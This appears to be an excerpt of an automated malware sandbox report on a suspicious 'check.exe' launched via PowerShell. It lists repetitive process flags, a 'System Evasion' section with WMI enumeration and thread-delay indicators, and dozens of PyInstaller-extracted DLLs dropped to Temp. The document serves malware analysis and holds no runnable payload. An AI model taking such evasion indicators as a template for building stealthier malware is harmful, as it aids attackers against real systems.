Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6271Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3423Jump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI79922\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
